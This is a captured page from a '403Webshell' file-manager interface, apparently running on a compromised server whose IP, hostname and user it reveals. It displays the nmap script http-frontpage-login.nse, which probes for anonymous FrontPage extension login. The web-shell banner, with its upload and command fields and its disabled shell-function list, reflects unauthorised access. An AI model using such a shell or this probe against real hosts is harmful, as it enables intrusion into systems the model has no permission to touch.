403Webshell
Server IP : 101.53.144.229  /  Your IP : 216.73.216.181
Web Server : Apache
System : Linux host.gdigitalindia.in 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : digitalshiksha ( 1179)
PHP Version : 5.6.40
Disable Function : eval,show_source,system,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,ini_alter,dl,show_source,curl_multi_exechellcmd, ini_restore,apache_get_modules,get_cfg_var,passthru, exec ,proc_get_status,fpassthru,c999_buff_prepare,c999_sess_put,c99_buff_prepare,c99_sess_put,proc_close,ini_alter,dl,symlink,link,proc_close,ini_alter,dl,symlink,link,mail
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/nmap/scripts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/nmap/scripts/http-frontpage-login.nse
local stdnse = require "stdnse"
local shortport = require "shortport"
local http = require "http"
local string = require "string"
local url = require "url"
local vulns = require "vulns"


description = [[
Checks whether target machines are vulnerable to anonymous Frontpage login.

Older, default configurations of Frontpage extensions allow
remote user to login anonymously which may lead to server compromise.

 ]]

---
-- @usage
-- nmap <target> -p 80 --script=http-frontpage-login
--
-- @args http-frontpage-login.path Path prefix to Frontpage directories. Defaults
-- to root ("/").
--
-- @output
-- PORT   STATE SERVICE REASON
-- 80/tcp open  http    syn-ack
-- | http-frontpage-login:
-- |   VULNERABLE:
-- |   Frontpage extension anonymous login
-- |     State: VULNERABLE
-- |     Description:
-- |       Default installations of older versions of frontpage extensions allow anonymous logins which can lead to server compromise.
-- |
-- |     References:
-- |_      http://insecure.org/sploits/Microsoft.frontpage.insecurities.html

author = "Aleksandar Nikolic"

license = "Same as Nmap--See http://nmap.org/book/man-legal.html"

categories = {"vuln", "safe"}

portrule = shortport.http

action = function(host, port)
	local path = stdnse.get_script_args('http-frontpage-login.path') or "/"
	local data
	local frontpage_vuln = {
		title = "Frontpage extension anonymous login",

		description = [[
Default installations of older versions of frontpage extensions allow anonymous logins which can lead to server compromise.
]],
		references = {
		  'http://insecure.org/sploits/Microsoft.frontpage.insecurities.html',
		},
		exploit_results = {},
	};

	local report = vulns.Report:new(SCRIPT_NAME, host, port);
	frontpage_vuln.state = vulns.STATE.NOT_VULN;

	data = http.get( host, port, path .. "/_vti_inf.html" )

	if data and data.status and data.status == 200 then
		--server does support frontpage extensions
		local fp_version = string.match(data.body,"FPVersion=\"[%d%.]*\"")
		if fp_version then
			-- do post request http://msdn.microsoft.com/en-us/library/ms446353
			local postdata = "method=open+service:".. fp_version .."&service_name=/"
			data = http.post(host,port,path .. "/_vti_bin/_vti_aut/author.dll",nil,nil,postdata)
			if data and data.status then
				if data.status == 200  then
					stdnse.print_debug("Frontpage returned 200 OK, server vulnerable.")
					frontpage_vuln.state = vulns.STATE.VULN;
					return report:make_output(frontpage_vuln);
				elseif data.status == 401  then
					stdnse.print_debug("Frontpage returned 401, password protected.")
					return false
				else
					stdnse.print_debug("Frontpage returned unknown response.")
					return false
				end
			end
		end
	end
	stdnse.print_debug("Frontpage probably not installed.")
	return false
end

Youez - 2016 - github.com/yon3zu
LinuXploit